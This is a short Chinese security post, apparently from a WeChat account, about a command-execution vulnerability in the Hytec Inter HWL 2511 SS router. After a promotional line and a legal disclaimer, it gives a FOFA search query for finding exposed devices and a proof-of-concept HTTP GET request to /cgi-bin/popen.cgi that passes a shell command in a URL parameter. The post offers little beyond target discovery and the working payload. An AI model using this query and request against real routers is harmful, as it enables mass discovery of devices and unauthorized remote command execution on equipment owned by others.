圈子免费体验！！！名额有限，先到先得！！！

由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！

免责声明

本文章仅用于信息安全防御技术分享，因用于其他用途而产生不良后果,作者不承担任何法律责任，请严格遵循中华人民共和国相关法律法规，禁止做一切违法犯罪行为。文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行负责。

Hytec Inter HWL 2511 SS 路由器

一：漏洞描述

Hytec Inter HWL 2511 SS 路由器命令执行漏洞

二：网络空间测绘查询

fofa

body="app/feature/portForwarding.js" || body="app/app.translate-config.js"

三：漏洞复现

poc

GET /cgi-bin/popen.cgi?command=ipconfig HTTP/1.1Host:  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1TContent-Length: 35Te: trailersConnection: close